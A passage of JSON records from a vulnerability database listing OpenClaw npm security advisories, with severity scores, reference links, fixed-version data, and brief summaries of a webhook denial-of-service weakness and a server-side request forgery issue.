"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42431" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-persistent-profile-mutation-via-node-invoke-browser-proxy-bypass", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N" }, { "value": "5.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "7.6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T13:12:10Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-persistent-profile-mutation-via-node-invoke-browser-proxy-bypass" }, { "reference_url": "https://github.com/advisories/GHSA-cmfr-9m2r-xwhq", "reference_id": "GHSA-cmfr-9m2r-xwhq", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-cmfr-9m2r-xwhq" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109872?format=api", "purl": "pkg:npm/openclaw@2026.4.8", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2g7x-vu14-nkde" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dqb2-dej7-augt" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-h9a4-1twb-d7d1" }, { "vulnerability": "VCID-hy24-6xpe-pkb7" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-pj41-sunw-vbcj" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w2yd-uw91-9yck" }, { "vulnerability": "VCID-wyat-1259-2kg9" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.8" } ], "aliases": [ "CVE-2026-42431", "GHSA-cmfr-9m2r-xwhq" ], "risk_score": 3.6, "exploitability": "0.5", "weighted_severity": "7.3", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-ma62-gtan-97au" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90122?format=api", "vulnerability_id": "VCID-mcz5-wgu1-z7g7", "summary": "OpenClaw: LINE webhook handler lacks shared pre-auth concurrency budget before signature verification\n## Summary\nLINE webhook handler lacks shared pre-auth concurrency budget before signature verification\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: low\n- Assessment: Shipped v2026.3.28 lacks a shared pre-auth concurrency budget on the public LINE webhook path, but the effect is bounded transient availability loss only, so low fits.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `57c47d8c7fbf5a2e70cc4dec2380977968903cad` — 2026-03-31T19:34:25+09:00\n\nOpenClaw thanks @nexrin for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41343", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0015", "scoring_system": "epss", "scoring_elements": "0.35317", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.0015", "scoring_system": "epss", "scoring_elements": "0.35292", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.0015", "scoring_system": "epss", "scoring_elements": "0.35328", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41343" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/57c47d8c7fbf5a2e70cc4dec2380977968903cad", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-24T14:30:05Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/57c47d8c7fbf5a2e70cc4dec2380977968903cad" }, { "reference_url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-qcc3-jqwp-5vh2", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-24T14:30:05Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-qcc3-jqwp-5vh2" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41343", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41343" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-denial-of-service-via-line-webhook-handler-pre-auth-concurrency", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-24T14:30:05Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-denial-of-service-via-line-webhook-handler-pre-auth-concurrency" }, { "reference_url": "https://github.com/advisories/GHSA-qcc3-jqwp-5vh2", "reference_id": "GHSA-qcc3-jqwp-5vh2", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-qcc3-jqwp-5vh2" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109907?format=api", "purl": "pkg:npm/openclaw@2026.3.31", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-pj41-sunw-vbcj" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31" } ], "aliases": [ "CVE-2026-41343", "GHSA-qcc3-jqwp-5vh2" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-mcz5-wgu1-z7g7" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89346?format=api", "vulnerability_id": "VCID-mggy-bv5s-5uax", "summary": "Duplicate Advisory: OpenClaw: SSRF via Unguarded Configured Base URLs in Multiple Channel Extensions (Incomplete Fix for CVE-2026-28476)\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-rhfg-j8jq-7v2h. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw before 2026.3.25 contains a server-side request forgery vulnerability in multiple channel extensions that fail to properly guard configured base URLs against SSRF attacks. Attackers can exploit unprotected fetch() calls against configured endpoints to rebind requests to blocked internal destinations and access restricted resources.", "references": [ { "reference_url": "https://github.com/openclaw/openclaw/commit/f92c92515bd439a71bd03eb1bc969c1964f17acf", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/commit/f92c92515bd439a71bd03eb1bc969c1964f17acf" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-rhfg-j8jq-7v2h", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-rhfg-j8jq-7v2h" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35629", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35629" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-server-side-request-forgery-via-unguarded-configured-base-urls-in-channel-extensions", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://www.vulncheck.com/advisories/openclaw-server-side-request-forgery-via-unguarded-configured-base-urls-in-channel-extensions" }, { "reference_url": "https://github.com/advisories/GHSA-8j7f-g9gv-7jhc", "reference_id": "GHSA-8j7f-g9gv-7jhc", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-8j7f-g9gv-7jhc" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109863?format=api", "purl": "pkg:npm/openclaw@2026.3.28", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1j3m-fecr-f7cn" }, { "vulnerability": "VCID-1p5p-eth5-3ufu" }, { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-26kp-dbu2-pqej" }, { "vulnerability": "VCID-26sg-e29u-hkf3" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-2uqu-k42d-1baq" }, { "vulnerability": "VCID-2wr9-h42m-a7ev" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-38g8-39ek-xbat" }, { "vulnerability": "VCID-3wsw-d4z2-dydt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-3zx4-t8cj-kbfn" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4hz5-f2pw-3yb4" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-5rgx-2krs-guck" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7dyw-9b37-yqh4" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7wmr-v7zb-6fc9" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-9xrt-mv81-3yc8" }, { "vulnerability": "VCID-a2wx-7b8h-c3h1" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-axp9-mt9z-gkgw" }, { "vulnerability": "VCID-b9w3-w2nq-cqg6" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-c4yt-z48z-zygv" }, { "vulnerability": "VCID-c76v-4577-n7c6" }, { "vulnerability": "VCID-carm-gpgh-wbbf" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-cvmw-sxfq-dyhz" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-da47-zdf1-mfgf" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fekn-d6f3-xfa6" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-g3hg-peh1-tudm" }, { "vulnerability": "VCID-g8r6-x6s5-uydq" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hd4w-s3dp-nubj" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-j8fb-fhyc-33fu" }, { "vulnerability": "VCID-jdqk-kv8u-xqa9" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-kzgh-7f6h-kfd1" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mcz5-wgu1-z7g7" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7me-4bzz-83cm" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-q9jf-srt4-fbcg" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-s3wz-3yzf-ybhz" }, { "vulnerability": "VCID-sja9-6t41-hud8" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-t991-75e7-ykdv" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-uy97-p1ex-y7df" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vktg-77tu-vycv" }, { "vulnerability": "VCID-vx5d-3d98-7kf3" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-watb-49vx-yub1" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wx44-n3fr-skah" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-x4hn-ygbg-mkep" }, { "vulnerability": "VCID-x794-wfnf-1ugf" }, { "vulnerability": "VCID-x7uw-s9a6-fybd" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": 